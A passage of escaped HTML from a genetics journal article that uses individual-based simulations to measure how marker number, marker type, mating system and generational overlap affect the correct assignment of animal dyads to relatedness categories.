media=\u0022all\u0022 \/\u003E\n\u003Clink type=\u0022text\/css\u0022 rel=\u0022stylesheet\u0022 href=\u0022https:\/\/www.g3journal.org\/sites\/default\/files\/advagg_css\/css__HGACIFBlu2o05y3afvqlt5wrE_5Dn6MXsexfuEpeIwg__q86Wxv3TZm7rY0DiT3-ukdsYcPpAsY783MkUOx0RQHY__lDZC-66ftm82LH3sOPsR2Vb4UhP_It_P-8RUoCcL4wY.css\u0022 media=\u0022all\u0022 \/\u003E\n\u003Clink rel=\u0027stylesheet\u0027 type=\u0027text\/css\u0027 href=\u0027\/sites\/all\/modules\/contrib\/panels\/plugins\/layouts\/onecol\/onecol.css\u0027 \/\u003E\u003C\/head\u003E\u003Cbody\u003E\u003Cdiv class=\u0022panels-ajax-tab-panel panels-ajax-tab-panel-jnl-genetics-tab-art\u0022\u003E\u003Cdiv class=\u0022panel-display panel-1col clearfix\u0022 \u003E\n \u003Cdiv class=\u0022panel-panel panel-col\u0022\u003E\n \u003Cdiv\u003E\u003Cdiv class=\u0022panel-pane pane-highwire-markup article-page-highwire\u0022 \u003E\n \n \n \n \u003Cdiv class=\u0022pane-content\u0022\u003E\n \u003Cdiv class=\u0022highwire-markup\u0022\u003E\u003Cdiv xmlns=\u0022http:\/\/www.w3.org\/1999\/xhtml\u0022 id=\u0022content-block-markup\u0022 data-highwire-cite-ref-tooltip-instance=\u0022highwire_reflinks_tooltip\u0022 xmlns:xhtml=\u0022http:\/\/www.w3.org\/1999\/xhtml\u0022\u003E\u003Cdiv class=\u0022article fulltext-view \u0022\u003E\u003Cspan class=\u0022highwire-journal-article-marker-start\u0022\u003E\u003C\/span\u003E\u003Cdiv class=\u0022section abstract\u0022 id=\u0022abstract-1\u0022\u003E\u003Ch2\u003EAbstract\u003C\/h2\u003E\u003Cp id=\u0022p-2\u0022\u003EKinship analyses are important pillars of ecological and conservation genetic studies with potentially far-reaching implications. There is a need for power analyses that address a range of possible relationships. Nevertheless, such analyses are rarely applied, and studies that use genetic-data-based-kinship inference often ignore the influence of intrinsic population characteristics. We investigated 11 questions regarding the correct classification rate of dyads to relatedness categories (relatedness category assignments; RCA) using an individual-based model with realistic life history parameters. We investigated the effects of the number of genetic markers; marker type (microsatellite, single nucleotide polymorphism SNP, or both); minor allele frequency; typing error; mating system; and the number of overlapping generations under different demographic conditions. We found that (i) an increasing number of genetic markers increased the correct classification rate of the RCA so that up to \u0026gt;80% first cousins can be correctly assigned; (ii) the minimum number of genetic markers required for assignments with 80 and 95% correct classifications differed between relatedness categories, mating systems, and the number of overlapping generations; (iii) the correct classification rate was improved by adding additional relatedness categories and age and mitochondrial DNA data; and (iv) a combination of microsatellite and single-nucleotide polymorphism data increased the correct classification rate if \u0026lt;800 SNP loci were available. This study shows how intrinsic population characteristics, such as mating system and the number of overlapping generations, life history traits, and genetic marker characteristics, can influence the correct classification rate of an RCA study. Therefore, species-specific power analyses are essential for empirical studies.\u003C\/p\u003E\u003C\/div\u003E\u003Cul class=\u0022kwd-group\u0022\u003E\u003Cli class=\u0022kwd\u0022\u003E\u003Ca href=\u0022\/keyword\/identity-descent-ibd\u0022 class=\u0022hw-term hw-article-keyword hw-article-keyword-identity-by-descent-ibd\u0022 rel=\u0022nofollow\u0022\u003Eidentity by descent (IBD)\u003C\/a\u003E\u003C\/li\u003E\u003Cli class=\u0022kwd\u0022\u003E\u003Ca href=\u0022\/keyword\/relatedness\u0022 class=\u0022hw-term hw-article-keyword hw-article-keyword-relatedness\u0022 rel=\u0022nofollow\u0022\u003Erelatedness\u003C\/a\u003E\u003C\/li\u003E\u003Cli class=\u0022kwd\u0022\u003E\u003Ca href=\u0022\/keyword\/pedigree-reconstruction\u0022 class=\u0022hw-term hw-article-keyword hw-article-keyword-pedigree-reconstruction\u0022 rel=\u0022nofollow\u0022\u003Epedigree reconstruction\u003C\/a\u003E\u003C\/li\u003E\u003Cli class=\u0022kwd\u0022\u003E\u003Ca href=\u0022\/keyword\/relatedness-category-assignment\u0022 class=\u0022hw-term hw-article-keyword hw-article-keyword-relatedness-category-assignment\u0022 rel=\u0022nofollow\u0022\u003Erelatedness category assignment\u003C\/a\u003E\u003C\/li\u003E\u003Cli class=\u0022kwd\u0022\u003E\u003Ca href=\u0022\/keyword\/intrinsic-population-characteristics\u0022 class=\u0022hw-term hw-article-keyword hw-article-keyword-intrinsic-population-characteristics\u0022 rel=\u0022nofollow\u0022\u003Eintrinsic population characteristics\u003C\/a\u003E\u003C\/li\u003E\u003C\/ul\u003E\u003Cp id=\u0022p-3\u0022\u003EKnowledge about kinship (pedigree and relatedness) is central to our understanding of ecological and evolutionary processes and an integral part of the management and conservation of endangered populations, such as trend and distribution of abundance as well as dispersal rates and individual fitness (\u003Ca id=\u0022xref-ref-3-1\u0022 class=\u0022xref-bibr\u0022 href=\u0022#ref-3\u0022\u003EAvise 1992\u003C\/a\u003E; \u003Ca id=\u0022xref-ref-11-1\u0022 class=\u0022xref-bibr\u0022 href=\u0022#ref-11\u0022\u003EColtman \u003Cem\u003Eet al.\u003C\/em\u003E 2003\u003C\/a\u003E; \u003Ca id=\u0022xref-ref-32-1\u0022 class=\u0022xref-bibr\u0022 href=\u0022#ref-32\u0022\u003EPalsb\u00f8ll \u003Cem\u003Eet al.\u003C\/em\u003E 2010\u003C\/a\u003E; \u003Ca id=\u0022xref-ref-50-1\u0022 class=\u0022xref-bibr\u0022 href=\u0022#ref-50\u0022\u003EWang 2014\u003C\/a\u003E). In the past, inferring relatedness from molecular genetic data was regarded as an approximation to the true pedigree relatedness. However, as molecular techniques improve, the pedigree is being regarded as only an approximation to the true relatedness or identity by descent (IBD, rather than IBS, or identity by state) that can be found in each part of the genome (\u003Ca id=\u0022xref-ref-5-1\u0022 class=\u0022xref-bibr\u0022 href=\u0022#ref-5\u0022\u003EBenjamin \u003Cem\u003Eet al.\u003C\/em\u003E 2012\u003C\/a\u003E; \u003Ca id=\u0022xref-ref-40-1\u0022 class=\u0022xref-bibr\u0022 href=\u0022#ref-40\u0022\u003ESpeed and Balding 2015\u003C\/a\u003E). Of course, cases remain in which insights into the pedigree is important, such as niche inheritance, cultural inheritance, as well as epigenetic inheritance (\u003Ca id=\u0022xref-ref-7-1\u0022 class=\u0022xref-bibr\u0022 href=\u0022#ref-7\u0022\u003EBonduriansky 2012\u003C\/a\u003E; \u003Ca id=\u0022xref-ref-14-1\u0022 class=\u0022xref-bibr\u0022 href=\u0022#ref-14\u0022\u003EDanchin 2013\u003C\/a\u003E; \u003Ca id=\u0022xref-ref-27-1\u0022 class=\u0022xref-bibr\u0022 href=\u0022#ref-27\u0022\u003EKopps \u003Cem\u003Eet al.\u003C\/em\u003E 2014\u003C\/a\u003E). Therefore, it is possible to justify both reconstructed pedigrees and the approximation to true relatedness, and it is important to assess how well molecular and pedigree assessments of relatedness correspond to one another.\u003C\/p\u003E\u003Cp id=\u0022p-4\u0022\u003EPedigrees can be estimated on the basis of genetic similarity among individuals of a population (\u003Ca id=\u0022xref-ref-6-1\u0022 class=\u0022xref-bibr\u0022 href=\u0022#ref-6\u0022\u003EBlouin 2003\u003C\/a\u003E). The equations used to assess genetic relatedness compare the observed genetic similarity between dyads to the population average (\u003Cem\u003Ee.g.\u003C\/em\u003E, \u003Ca id=\u0022xref-ref-35-1\u0022 class=\u0022xref-bibr\u0022 href=\u0022#ref-35\u0022\u003EQueller and Goodnight 1989\u003C\/a\u003E) or provide likelihoods that a dyad belongs to several potential relationships based on Mendelian allele segregation (\u003Ca id=\u0022xref-ref-44-1\u0022 class=\u0022xref-bibr\u0022 href=\u0022#ref-44\u0022\u003EThompson 1975\u003C\/a\u003E). The \u201ccorrect classification rate\u201d of these likelihood equations is defined as the frequency of dyads that are assigned to a category and that are true members of that category (\u003Ca id=\u0022xref-ref-42-1\u0022 class=\u0022xref-bibr\u0022 href=\u0022#ref-42\u0022\u003EThomas and Hill 2000\u003C\/a\u003E; \u003Ca id=\u0022xref-ref-46-1\u0022 class=\u0022xref-bibr\u0022 href=\u0022#ref-46\u0022\u003EWang 2004\u003C\/a\u003E; \u003Ca id=\u0022xref-ref-51-1\u0022 class=\u0022xref-bibr\u0022 href=\u0022#ref-51\u0022\u003EWang and Santure 2009\u003C\/a\u003E). Most software used to assess genetic relationships based on genetic markers can deal with genotyping error (\u003Cem\u003Ee.g.\u003C\/em\u003E, \u003Ca id=\u0022xref-ref-29-1\u0022 class=\u0022xref-bibr\u0022 href=\u0022#ref-29\u0022\u003EMarshall \u003Cem\u003Eet al.\u003C\/em\u003E 1998\u003C\/a\u003E; \u003Ca id=\u0022xref-ref-22-1\u0022 class=\u0022xref-bibr\u0022 href=\u0022#ref-22\u0022\u003EJones and Wang 2010\u003C\/a\u003E). However, except for parentage, there has been limited effort devoted to assessing the effects of intrinsic population characteristics and other aspects of the quality and quantity of data necessary to attain high correct classification rates in the estimation of relatedness among individuals (\u003Cem\u003Ee.g.\u003C\/em\u003E, \u003Ca id=\u0022xref-ref-2-1\u0022 class=\u0022xref-bibr\u0022 href=\u0022#ref-2\u0022\u003EAnderson and Garza 2006\u003C\/a\u003E; \u003Ca id=\u0022xref-ref-4-1\u0022 class=\u0022xref-bibr\u0022 href=\u0022#ref-4\u0022\u003EAykanat \u003Cem\u003Eet al.\u003C\/em\u003E 2014\u003C\/a\u003E).\u003C\/p\u003E\u003Cp id=\u0022p-5\u0022\u003EIntrinsic population characteristics such as mating system and number of overlapping generations, which is determined by the relationship between generation time and life span, are expected to affect a population\u2019s \u201ckinship composition,\u201d that is, the distribution of the different relatedness categories in a population (\u003Ca id=\u0022xref-ref-46-2\u0022 class=\u0022xref-bibr\u0022 href=\u0022#ref-46\u0022\u003EWang 2004\u003C\/a\u003E). For example, full sibs are unexpected in a population with a promiscuous mating system. Also, dyads related as parent and offspring cannot be observed at the same time in species with nonoverlapping generations. The equations used for relatedness analyses are solely based on Mendelian probabilities and therefore do not take such life history parameters into account. Therefore the correct classification rate of these equations may depend on intrinsic population characteristics due to different kinship compositions. In this paper, we assessed the correct classification rate in one commonly used estimation of pairwise categories of relatedness in three different mating systems (monogamy, polygyny, and promiscuity) and one or three overlapping generations (\u003Ca id=\u0022xref-table-wrap-1-1\u0022 class=\u0022xref-table\u0022 href=\u0022#T1\u0022\u003ETable 1\u003C\/a\u003E) as a function of the number (and kind) of loci.\u003C\/p\u003E\u003Cdiv id=\u0022T1\u0022 class=\u0022table pos-float\u0022\u003E\u003Cdiv class=\u0022table-inline table-callout-links\u0022\u003E\u003Cdiv class=\u0022callout\u0022\u003E\u003Cspan\u003EView this table:\u003C\/span\u003E\u003Cul class=\u0022callout-links\u0022\u003E\u003Cli class=\u0022view-inline first\u0022\u003E\u003Ca href=\u0022##\u0022 class=\u0022table-expand-inline\u0022 data-table-url=\u0022\/highwire\/markup\/466711\/expansion?postprocessors=highwire_tables%2Chighwire_reclass%2Chighwire_figures%2Chighwire_math%2Chighwire_inline_linked_media%2Chighwire_embed\u0026amp;table-expand-inline=1\u0022 data-icon-position=\u0022\u0022 data-hide-link-title=\u00220\u0022\u003EView inline\u003C\/a\u003E\u003C\/li\u003E\u003Cli class=\u0022view-popup last\u0022\u003E\u003Ca href=\u0022\/highwire\/markup\/466711\/expansion?width=1000\u0026amp;height=500\u0026amp;iframe=true\u0026amp;postprocessors=highwire_tables%2Chighwire_reclass%2Chighwire_figures%2Chighwire_math%2Chighwire_inline_linked_media%2Chighwire_embed\u0022 class=\u0022colorbox colorbox-load table-expand-popup\u0022 rel=\u0022gallery-fragment-tables\u0022 data-icon-position=\u0022\u0022 data-hide-link-title=\u00220\u0022\u003EView popup\u003C\/a\u003E\u003C\/li\u003E\u003C\/ul\u003E\u003C\/div\u003E\u003C\/div\u003E\u003Cdiv class=\u0022table-caption\u0022\u003E\u003Cspan class=\u0022table-label\u0022\u003ETable 1\u003C\/span\u003E \u003Cspan class=\u0022caption-title\u0022\u003EQuestions, reasoning and results\u003C\/span\u003E\u003Cdiv class=\u0022sb-div caption-clear\u0022\u003E\u003C\/div\u003E\u003C\/div\u003E\u003C\/div\u003E\u003Cp id=\u0022p-7\u0022\u003EThere are two main types of relatedness estimators (\u003Ca id=\u0022xref-ref-6-2\u0022 class=\u0022xref-bibr\u0022 href=\u0022#ref-6\u0022\u003EBlouin 2003\u003C\/a\u003E). The first one, method of moments relatedness estimation (\u003Cem\u003Ee.g.\u003C\/em\u003E, \u003Ca id=\u0022xref-ref-35-2\u0022 class=\u0022xref-bibr\u0022 href=\u0022#ref-35\u0022\u003EQueller and Goodnight 1989\u003C\/a\u003E), assigns a value to each dyad based on IBD allele sharing. Typically, these values range from \u22121 (no similarity) to +1 (perfect match). Relatedness estimates and pedigree relatedness (mean expectations, \u003Cem\u003Ei.e.\u003C\/em\u003E, 0.5 for parent-offspring, 0.25 for half sibs, etc.) are highly correlated; however, the variance of relatedness estimates is usually high and in many cases the estimated relatedness does not agree with the actual pedigree (\u003Ca id=\u0022xref-ref-38-1\u0022 class=\u0022xref-bibr\u0022 href=\u0022#ref-38\u0022\u003ESanture \u003Cem\u003Eet al.\u003C\/em\u003E 2010\u003C\/a\u003E). This means that relatedness estimates are more suitable for assessing the relatedness for a group of individuals rather than dyadic relatedness. Even though the variance of the relatedness of a group of individuals declines with increasing number of loci (\u003Ca id=\u0022xref-ref-35-3\u0022 class=\u0022xref-bibr\u0022 href=\u0022#ref-35\u0022\u003EQueller and Goodnight 1989\u003C\/a\u003E) the correlation between pedigree relatedness and pairwise relatedness estimates did not exceed 0.86 even when relatedness estimates were based on 771 single-nucleotide polymorphisms (SNPs; \u003Ca id=\u0022xref-ref-38-2\u0022 class=\u0022xref-bibr\u0022 href=\u0022#ref-38\u0022\u003ESanture \u003Cem\u003Eet al.\u003C\/em\u003E 2010\u003C\/a\u003E).\u003C\/p\u003E\u003Cp id=\u0022p-8\u0022\u003EThe second type of relatedness estimator is the assignment of likelihood ratios to dyads belonging to certain relatedness categories {\u003Cem\u003Ei.e.\u003C\/em\u003E, parent-offspring [PO], full sibs [FS], relationships sharing on average a quarter of their genome IBD [R = 0.25: half sibs, grandparent\u2212grandchild, avuncular (any of the four combinations: aunt\/uncle-niece\/nephew)], relationships sharing on average one eighth of their genome IBD [R = 0.125: first cousins], and unrelated}. The assignment of dyads to relatedness categories is based on the likelihood that a pair of individuals shares zero (\u0394\u003Csub\u003E0\u003C\/sub\u003E), one (\u0394\u003Csub\u003E1\u003C\/sub\u003E) or two (\u0394\u003Csub\u003E2\u003C\/sub\u003E) alleles that are IBD (\u003Ca id=\u0022xref-ref-44-2\u0022 class=\u0022xref-bibr\u0022 href=\u0022#ref-44\u0022\u003EThompson 1975\u003C\/a\u003E; \u003Ca id=\u0022xref-ref-43-1\u0022 class=\u0022xref-bibr\u0022 href=\u0022#ref-43\u0022\u003EThompson 1991\u003C\/a\u003E). This likelihood is calculated by multiplying probabilities across unlinked loci and it is different for each relatedness category. A dyad is assigned to the relatedness category for which it has the highest likelihood. We will focus on the relatedness category assignment (RCA) method in this paper because knowledge about relatedness categories provides essential information for niche inheritance, cultural inheritance, and epigenetic inheritance studies.\u003C\/p\u003E\u003Cp id=\u0022p-9\u0022\u003ETo date, studies assessing the power to assign dyads to relatedness categories are based on a null hypothesis category \u003Cem\u003Evs.\u003C\/em\u003E an alternative category (\u003Cem\u003Ee.g.\u003C\/em\u003E, full sib \u003Cem\u003Evs.\u003C\/em\u003E half sib) (\u003Cem\u003Ee.g.\u003C\/em\u003E, \u003Ca id=\u0022xref-ref-8-1\u0022 class=\u0022xref-bibr\u0022 href=\u0022#ref-8\u0022\u003EBrookfield and Parkin 1993\u003C\/a\u003E; \u003Ca id=\u0022xref-ref-47-2\u0022 class=\u0022xref-bibr\u0022 href=\u0022#ref-47\u0022\u003EWang 2006\u003C\/a\u003E; \u003Ca id=\u0022xref-ref-51-2\u0022 class=\u0022xref-bibr\u0022 href=\u0022#ref-51\u0022\u003EWang and Santure 2009\u003C\/a\u003E; \u003Ca id=\u0022xref-ref-38-3\u0022 class=\u0022xref-bibr\u0022 href=\u0022#ref-38\u0022\u003ESanture \u003Cem\u003Eet al.\u003C\/em\u003E 2010\u003C\/a\u003E). This method is valid if previous knowledge is available, \u003Cem\u003Ee.g.\u003C\/em\u003E, are chicks in a nest full or half sibs? However, in a natural population and in the absence of any previous knowledge this kind of power analysis may be misleading in terms of underestimating the number of required loci for reliable RCAs. In addition to the relatedness category restrictions, the influence of intrinsic population characteristics on the correct classification rate of relationship assignments is often limited. For example, \u003Ca id=\u0022xref-ref-51-3\u0022 class=\u0022xref-bibr\u0022 href=\u0022#ref-51\u0022\u003EWang and Santure (2009)\u003C\/a\u003E focused only on parentage and sibship inference in a polygamous population (here referred to as promiscuous) for studying the power of relationship assignments. We assessed the correct classification rate of RCA, including relatedness categories with relatively high IBD, and with a realistic degree of background relatedness in the study population.\u003C\/p\u003E\u003Cp id=\u0022p-10\u0022\u003EThe advances in new massive parallel sequencing methods facilitate the genotyping of an increased number of genetic loci per individual (\u003Ca id=\u0022xref-ref-16-1\u0022 class=\u0022xref-bibr\u0022 href=\u0022#ref-16\u0022\u003EGardner \u003Cem\u003Eet al.\u003C\/em\u003E 2011\u003C\/a\u003E; \u003Ca id=\u0022xref-ref-33-1\u0022 class=\u0022xref-bibr\u0022 href=\u0022#ref-33\u0022\u003EPeterson \u003Cem\u003Eet al.\u003C\/em\u003E 2012\u003C\/a\u003E), which may increase the correct classification rate of RCAs. In studies estimating pairwise categories of relatedness, the class of loci most commonly used have been short tandem repeats (STRs), but the use of SNPs has been increasing (\u003Ca id=\u0022xref-ref-52-1\u0022 class=\u0022xref-bibr\u0022 href=\u0022#ref-52\u0022\u003EWeir \u003Cem\u003Eet al.\u003C\/em\u003E 2006\u003C\/a\u003E). Each class of loci has its specific advantages and disadvantages. STRs are more informative per locus because they are usually more polymorphic than the often biallelic SNPs (\u003Ca id=\u0022xref-ref-30-1\u0022 class=\u0022xref-bibr\u0022 href=\u0022#ref-30\u0022\u003EMorin \u003Cem\u003Eet al.\u003C\/em\u003E 2004\u003C\/a\u003E). On the other hand, SNPs are more abundant and more suitable for automated data analyses than STRs (\u003Ca id=\u0022xref-ref-45-1\u0022 class=\u0022xref-bibr\u0022 href=\u0022#ref-45\u0022\u003EVignal \u003Cem\u003Eet al.\u003C\/em\u003E 2002\u003C\/a\u003E; \u003Ca id=\u0022xref-ref-30-2\u0022 class=\u0022xref-bibr\u0022 href=\u0022#ref-30\u0022\u003EMorin \u003Cem\u003Eet al.\u003C\/em\u003E 2004\u003C\/a\u003E).\u003C\/p\u003E\u003Cp id=\u0022p-11\u0022\u003EIn this study, we assessed the correct classification rate for assignment of dyads to relatedness categories, and how the correct classification rate is influenced by number and type of genetic markers, minor allele frequency (MAF), genotyping error, mating system, and including or excluding overlap of generations by looking at 11 questions outlined in \u003Ca id=\u0022xref-table-wrap-1-2\u0022 class=\u0022xref-table\u0022 href=\u0022#T1\u0022\u003ETable 1\u003C\/a\u003E.\u003C\/p\u003E\u003Cdiv class=\u0022section materials-methods\u0022 id=\u0022sec-1\u0022\u003E\u003Ch2 class=\u0022\u0022\u003EMaterials and Methods\u003C\/h2\u003E\u003Cp id=\u0022p-12\u0022\u003EEleven questions (\u003Ca id=\u0022xref-table-wrap-1-3\u0022 class=\u0022xref-table\u0022 href=\u0022#T1\u0022\u003ETable 1\u003C\/a\u003E) were investigated in this study using an individual-based model in which pedigree relatedness was tracked and compared with the most likely relatedness category, which was assigned based on genetic markers. Individual-based models provide a means to investigate characteristics influenced by stochastic processes such as Mendelian segregation of alleles. We developed a model capable of simulating different natural systems, modified from a similar model originally designed by \u003Ca id=\u0022xref-ref-25-1\u0022 class=\u0022xref-bibr\u0022 href=\u0022#ref-25\u0022\u003EKopps and Sherwin (2012)\u003C\/a\u003E, which was aimed at the Shark Bay bottlenose dolphin population (\u003Cem\u003ETursiops\u003C\/em\u003E sp.). For this study, the modifications to the original model include the implementation of additional mating systems, variable number of overlapping generations, an increase in the maximum number of (unlinked) genetic markers, and the tracking of pedigree relatedness. For each individual in a simulation (except at the start of the simulation) the parents, grandparents and great-grandparents were known. Pedigree-based unrelated individuals were individuals that did not share any common ancestors in the three previous generations. All simulations were run in Matlab R2012a (MathWorks, Natick, MA).\u003C\/p\u003E\u003Cp id=\u0022p-13\u0022\u003EThe RCAs based on genetic markers were performed using the likelihood equations outlined in \u003Ca id=\u0022xref-ref-15-1\u0022 class=\u0022xref-bibr\u0022 href=\u0022#ref-15\u0022\u003EEpstein \u003Cem\u003Eet al.\u003C\/em\u003E (2000)\u003C\/a\u003E. Each dyad was assigned to the relatedness category for which it had the highest likelihood. Unless otherwise stated, we assessed six relatedness categories: monozygotic twins, PO; FS; R = 0.25; R = 0.125; and unrelated.\u003C\/p\u003E\u003Cp id=\u0022p-14\u0022\u003EAll simulations were initiated with a population size of 600 individuals as in \u003Ca id=\u0022xref-ref-25-2\u0022 class=\u0022xref-bibr\u0022 href=\u0022#ref-25\u0022\u003EKopps and Sherwin (2012)\u003C\/a\u003E and run for 100 time steps before assessing the correct classification rate of the relatedness estimation. One hundred time steps was considered a good compromise between being able to track three generations of ancestors and not losing much genetic variation due to genetic drift. Individuals in the simulation could lived for a maximum of 12 time steps (age class 12) and became sexually mature at age class 4. Unless otherwise stated, results shown were averaged over 10 independent simulations. Ten simulations proved sufficient because repeated sets of 10 simulations gave identical answers for the number of loci necessary to achieve a correct classification rate of 80 or 95% for assigning dyads to relatedness categories.\u003C\/p\u003E\u003Cdiv id=\u0022sec-2\u0022 class=\u0022subsection\u0022\u003E\u003Ch3\u003EMating system and generational overlap\u003C\/h3\u003E\u003Cp id=\u0022p-15\u0022\u003EMating systems influence the genetic make-up of a population including the kinship composition, and thus may influence the performance of RCAs. We therefore simulated three different, general mating systems: monogamy, polygyny, and promiscuity. Based on the life history values used in all three scenarios (\u003Ca href=\u0022http:\/\/www.g3journal.org\/lookup\/suppl\/doi:10.1534\/g3.115.019323\/-\/DC1\/019323SI.pdf\u0022\u003ESupporting Information\u003C\/a\u003E, \u003Ca href=\u0022http:\/\/www.g3journal.org\/lookup\/suppldoi:10.1534\/g3.115.019323\/-\/DC1\/TableS1.pdf\u0022\u003ETable S1\u003C\/a\u003E), the maximum number of overlapping generations during each time step was three, unless otherwise stated. In the case of the monogamy scenario, males and females were paired for life. In the event that a paired individual died, the surviving individual in the pair would be paired with an available, sexually mature individual of the opposite sex. In the polygynous scenario (\u003Ca href=\u0022http:\/\/www.g3journal.org\/lookup\/suppldoi:10.1534\/g3.115.019323\/-\/DC1\/TableS1.pdf\u0022\u003ETable S1\u003C\/a\u003E), 60 territories were available and each was occupied by a single mature male. When a territory-holding male died he was replaced by a mature, nonterritory holding male, if possible from age classes 7 to 9. Females initially were assigned randomly to a male\u2019s territory, where they remained for life. In the promiscuous scenario, males and females were mated randomly.\u003C\/p\u003E\u003Cp id=\u0022p-16\u0022\u003EWith a small number of exceptions, monogamous, polygynous and promiscuous scenarios were modeled with identical life history parameter values (\u003Ca href=\u0022http:\/\/www.g3journal.org\/lookup\/suppldoi:10.1534\/g3.115.019323\/-\/DC1\/TableS1.pdf\u0022\u003ETable S1\u003C\/a\u003E). The exceptions were required because of stochastic model constraints and included the alteration of the average number of offspring per female between simulations with different mating systems. We are aware that there is some artificiality in using the same life history data in scenarios with different mating systems. However, to investigate the effect of mating system on the correct classification rate of RCAs, it was essential to use the same life history data for each mating system scenario, in order to avoid confounding factors when drawing conclusions about the effect of the scenarios.\u003C\/p\u003E\u003Cp id=\u0022p-17\u0022\u003EOverlap of generations during the sampled time-period affects the kinship composition; for example, in populations with nonoverlapping generations there can be no detection of \u003Cem\u003Etrans\u003C\/em\u003E-generational kin such as parent-offspring, grandparent\u2013grand offspring, avuncular. To test whether the absence of certain pedigree relationships in the population influences the correct classification rate of an RCA we also adapted each mating scenario so that generations would not overlap during a sampled time-period. All simulation parameters were the same as in simulations with overlapping generations, except for age at maturity, life expectancy and average number of offspring per female (\u003Ca href=\u0022http:\/\/www.g3journal.org\/lookup\/suppldoi:10.1534\/g3.115.019323\/-\/DC1\/TableS1.pdf\u0022\u003ETable S1\u003C\/a\u003E). The population size was kept constant by letting 550-650 offspring survive each generation to produce the next generation.\u003C\/p\u003E\u003C\/div\u003E\u003Cdiv id=\u0022sec-3\u0022 class=\u0022subsection\u0022\u003E\u003Ch3\u003ENumber of loci\u003C\/h3\u003E\u003Cp id=\u0022p-18\u0022\u003EWe estimated the correct classification rates of RCAs from data sets with 10, 20, 40, and 80 STRs, or 50, 100, 200, 400, 800, 1600, or 3200 SNPs. Additionally we performed single simulations with 50,000 SNPs. Because many laboratories are in transition from STR to SNP genotyping, we also considered whether the use of a combination of the two marker types may increase the correct classification rate of an RCA compared with the use of a single marker type. For that purpose, we combined the relatedness category probabilities of 20 STR loci with 50, 100, 200, 400, 800, 1600, or 3200 SNPs. To allow for direct comparisons, we used the same conditions for the combined marker types as for the SNPs only analyses. For the STRs-only analyses we used the same simulations as for the SNPs MAF 0.5 scenarios.\u003C\/p\u003E\u003Cp id=\u0022p-19\u0022\u003ENote that, at least for population structure studies based on STRs, the number of alleles has been found to be more informative than the number of loci (\u003Ca id=\u0022xref-ref-23-2\u0022 class=\u0022xref-bibr\u0022 href=\u0022#ref-23\u0022\u003EKalinowski 2002\u003C\/a\u003E). All SNP loci were biallelic and the 80 STR loci implemented in the simulation consisted of eight identical (but independent) sets of 10 STRs (\u003Ca id=\u0022xref-ref-25-3\u0022 class=\u0022xref-bibr\u0022 href=\u0022#ref-25\u0022\u003EKopps and Sherwin 2012\u003C\/a\u003E) so that the number of alleles doubled with every duplication of the number of markers used. At the start of the simulations, these sets of 10 STRs had an average of 5.6 alleles\/locus. This number is similar to that found in many empirical studies but in our simulations the loci had significantly higher expected heterozygosity (\u003Cem\u003Ee.g.\u003C\/em\u003E, \u003Ca id=\u0022xref-ref-25-4\u0022 class=\u0022xref-bibr\u0022 href=\u0022#ref-25\u0022\u003EKopps and Sherwin 2012\u003C\/a\u003E; \u003Ca id=\u0022xref-ref-26-1\u0022 class=\u0022xref-bibr\u0022 href=\u0022#ref-26\u0022\u003EKopps \u003Cem\u003Eet al.\u003C\/em\u003E 2013\u003C\/a\u003E; \u003Ca id=\u0022xref-ref-9-1\u0022 class=\u0022xref-bibr\u0022 href=\u0022#ref-9\u0022\u003EBrown \u003Cem\u003Eet al.\u003C\/em\u003E 2014\u003C\/a\u003E; \u003Ca id=\u0022xref-ref-13-1\u0022 class=\u0022xref-bibr\u0022 href=\u0022#ref-13\u0022\u003ECrean \u003Cem\u003Eet al.\u003C\/em\u003E 2014\u003C\/a\u003E).\u003C\/p\u003E\u003C\/div\u003E\u003Cdiv id=\u0022sec-4\u0022 class=\u0022subsection\u0022\u003E\u003Ch3\u003EProportion of population sampled, MAF, and typing error\u003C\/h3\u003E\u003Cp id=\u0022p-20\u0022\u003EIn most field studies, it is not feasible to sample the entire population. Accordingly, we ran scenarios in which 50, 25, 12.5, and 6.25% of the population were sampled to assess how the sampled fraction impacted the correct classification rate of the RCA relative to sampling the entire population (\u003Cem\u003Ei.e.\u003C\/em\u003E, perfect allele frequency estimates). This assessment was conducted with data from 400 and 3200 SNP loci, as well as 400 and 3200 SNP loci combined with 20 STR loci, and 80 STR loci.\u003C\/p\u003E\u003Cp id=\u0022p-21\u0022\u003EWe also investigated the influence of genotyping errors and MAF upon the correct classification rate of RCAs. MAF was defined as the mean allele frequency of the rarer SNP allele at the start of the simulations, ranging from 0 to 0.5. We assessed the effect on correct classification rate of varying the mean MAF across loci at three different mean MAFs: 0.05; 0.25; 0.5. For some simulations, we implemented a typing error to assess any reduction in correct classification rate of RCAs. Each allele at each locus had the same probability of being mistyped (1%), leading to a 2% locus specific typing error rate, which is the error rate used in \u003Ca id=\u0022xref-ref-47-3\u0022 class=\u0022xref-bibr\u0022 href=\u0022#ref-47\u0022\u003EWang (2006)\u003C\/a\u003E.\u003C\/p\u003E\u003C\/div\u003E\u003Cdiv id=\u0022sec-5\u0022 class=\u0022subsection\u0022\u003E\u003Ch3\u003EExclusion and inclusion of relatedness categories for assessment\u003C\/h3\u003E\u003Cp id=\u0022p-22\u0022\u003EThe correct classification rate of an RCA might be influenced by what categories of relatedness are chosen for assessment. We assessed whether the correct classification rate changed when the RCA did not attempt to identify certain categories of relatedness. For example, the proportion of false positives in the R = 0.125 category was high even when the estimation of relatedness was based upon data from 50,000 SNP loci. Therefore we tested whether not assessing the R = 0.125 category would increase the correct classification rate of the other relatedness categories.\u003C\/p\u003E\u003Cp id=\u0022p-23\u0022\u003EOn the other hand, it is also possible that assessment of an additional relatedness category would allow dyads that were previously wrongly classified to some other category to be more appropriately classified to the new category. This would improve the correct classification rate to assign dyads to other categories. To test this, some simulations included the assessment of the category R = 0.0625 (half first cousins [sharing one grandparent], first cousins once removed, double second cousins). The probability of identity states for sharing zero, one and two alleles\/locus used in the algorithm were: \u0394\u003Csub\u003E0\u003C\/sub\u003E = 0.875, \u0394\u003Csub\u003E1\u003C\/sub\u003E = 0.125, and \u0394\u003Csub\u003E2\u003C\/sub\u003E = 0.\u003C\/p\u003E\u003C\/div\u003E\u003Cdiv id=\u0022sec-6\u0022 class=\u0022subsection\u0022\u003E\u003Ch3\u003EIncorporating demographic and mitochondrial data (mtDNA)\u003C\/h3\u003E\u003Cp id=\u0022p-24\u0022\u003EIncorporating demographic and mtDNA data might improve the correct classification rate of an RCA by reducing the number of false positives (\u003Ca id=\u0022xref-ref-36-1\u0022 class=\u0022xref-bibr\u0022 href=\u0022#ref-36\u0022\u003ERiester \u003Cem\u003Eet al.\u003C\/em\u003E 2009\u003C\/a\u003E; \u003Ca 